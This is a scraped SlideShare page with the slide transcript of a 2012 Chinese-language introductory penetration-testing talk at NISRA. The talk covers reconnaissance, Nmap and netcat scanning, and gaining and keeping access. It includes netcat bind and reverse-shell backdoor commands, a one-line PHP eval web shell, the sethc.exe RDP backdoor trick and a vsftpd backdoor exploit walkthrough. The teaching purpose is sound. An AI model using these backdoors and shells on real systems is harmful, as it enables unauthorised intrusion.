Your SlideShare is downloading. ×
0
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

滲透測試 Talk @ Nisra

8,040

Published on

Orange @ NISRA …

Orange @ NISRA
2012 / 05 / 22

Published in: Technology
0 Comments
5 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
8,040
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
88
Comments
0
Likes
5
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. 滲透測試Orange @ NISRA 2012 / 05 / 22
  • 2. 目的1. 以駭客、攻擊者的眼光、手法,對系統進 行安全性測試2. 我們都是好孩子,要經過授權唷!^___^3. 基礎概念取向 – 技術 Detail 不講 – Web-based 自成一個章節不講
  • 3. 不專業的人來講專業的東西...
  • 4. 1. Reconnaissance2. Scanning3. Gaining Access4. Maintaining Access5. Clearing Tracks說是這樣說拉,不過實際上...
  • 5. Reconnaissance用盡一切方法拐到資訊1. Google # 想想人肉搜索2. Who.is3. DNS Zone transfer目標是? 有沒有防火牆? IDS? WAF? 網路架構長怎樣? 網頁伺服器是不是 Virtual host ?
  • 6. 資訊越多,入侵機會越多服務越多,入侵機會越多
  • 7. Google://"mail.xxx.xxx.xx"
  • 8. http://whois.sc/
  • 9. Cont. 案例分享• 利用 code.google.com 進行滲透測試。• 還記得上禮拜教的 Git 嗎?
  • 10. Scanning1. 觀察、分析、思考。2. Scanning Port # Nmap3. 弱點掃描 # Nessus, Metasploit # WebInspect, Acunetix3. 猜密碼 # Hydra, Ncrack – 空密碼, 123456, 帳密相同 – 帳號永遠比密碼難猜
  • 11. Cont. 案例分享• *經典範例*• RDP 後門 – sethc.exe• 連上遠端桌面第一件事不是打帳號,是快 速按下 shift 五次!!• 同理,看到登錄畫面第一件事是猜密碼、 預設密碼。
  • 12. 一般的應該像這樣
  • 13. 不太正常的會長得像這樣
  • 14. 比較有創意的會弄成這樣
  • 15. 比較有點 Level 又會這樣做
  • 16. 淡定低調風 ˊ_>ˋ
  • 17. Scanning port• Port = 埠、端口、窗戶 = 主機提供服務的窗口 = 有機會入侵的地方• 範圍從 1 到 65535• 21 = FTP• 23 = TELNET• 80 = WWW
  • 18. 檢查窗戶有沒有開?• telnet www.google.com 80• Netcat – nc www.google.com 80
  • 19. NetCat http://sectools.org/
  • 20. 折凳的奧妙之處,就是可以藏在民宅之中,隨手可得,還可以坐著它來隱藏殺機,打完更可以坐下休息,就算被條子抓到也告不了你,真不愧為七大武器之首!
  • 21. NetCat Usage• nc apple.com 80 # 檢查 port 開啟是否• nc apple.com 1-100 # 一次掃描多個 port• nc -v apple.com 80 # 詳細模式• nc -l -p 80 # 開 (listen) 一個 port• nc -e cmd.exe -lp 80 # 將執行內容綁到連線上
  • 22. NetCat 可以幹嘛? (1/3)• 範例主角 Cyndi & 大樹哥• Cyndi 要看 大樹 的網頁伺服器開了沒? – Cyndi : nc 大樹 80• Cyndi 要傳檔案給 大樹 – 大樹 : nc -lp 12345 > a.zip – Cyndi : nc 大樹 12345 < a.zip
  • 23. NetCat 可以幹嘛? (2/3)• Cyndi 入侵了 大樹 的電腦,想建個後門 – Cyndi 在 大樹 的電腦執行 : – nc -lp 888 -e cmd.exe – Cyndi: nc 大樹 888 即可連上後門 888
  • 24. NetCat 可以幹嘛? (2/3)• 大樹 裝了防火牆,又是在內網,怎麼辦 ? – 動動腦,三秒鐘把後門改造成 反連後門( Back connect) – Cyndi 執行 : nc -lp 888 – Cyndi 在 大樹 電腦執行 : – nc -e cmd.exe Cyndi 888 888
  • 25. NMAP Usage• http://nmap.org/ – nmap -sT 127.0.0.1 # 起手式 – nmap -sT -v 127.0.0.1 # 詳細模式 – nmap -sT 127.0.0.1-254# IP range – nmap -sT -p 80 127.0.0.1 # 指定端口 – nmap -sT -p 1-8 127.0.0.1 # Port range – nmap -A 127.0.0.1 # 檢測作業系統
  • 26. 實作• 請用 nmap 找出 orangee.tw 開了網頁伺服 器再奇怪的 port 上
  • 27. Gaining Access1. 關鍵點,請善用盡上一步取得的資訊。2. 存取權限分為 Read Write eXecute3. 失敗請退回上一步。• http://exploit-db.com/• Metasploit
  • 28. http://exploit-db.com/
  • 29. Cont. 案例分享• CVE-2012-1823 – PHP CGI Argument Injection• 為啥講它?
  • 30. http://ww.facebook.com/?-s
  • 31. Reconnaissance
  • 32. Scanning
  • 33. Gaining Access <?php @eval($_POST[cmd]); ?>
  • 34. Metasploit (1/2)
  • 35. Metasploit (2/2)• Exploits• Auxiliary• Payload
  • 36. 實作 (有時間的話)1. 使用 nmap 發現有開 FTP 服務2. 使用 nc 連接發現 FTP 是由 vsftp 架設並 且版本是 2.3.43. 透過 exploit-db 搜尋發現 vsftp 2.3.4 存在 backdoor !!4. 使用 Metasploit 進行攻擊 – unix -> ftp -> vsftpd234 backdoor
  • 37. Maintaining Access1. 普通使用者 vs. 最強使用者2. 提權 ( Privilege Escalation )3. 翻屍體4. 如何想來就來想走就走! – 後門 Backdoor – 木馬 Trojan – 乳器 Rootkit
  • 38. 實作 ( 詳細指令在 txt 裡 )1. Mimikatz – 原理會提一下,不懂就算了XD2. Enlightenment.tgz – 懶人包3. Mempodipper.c – 原理聽聽就算了XD
  • 39. Clearing Tracks1. 俗稱的擦屁屁2. 任何動作都會留下紀錄3. 壞事不要幹,要幹就要懂的保護自己舉例:
  • 40. 傻傻的• 保護當事人,徹圖
  • 41. 安全的本質是什麼? http://hi.baidu.com/yuange1975/blog
  • 42. ThanksOrange@nisra.net

×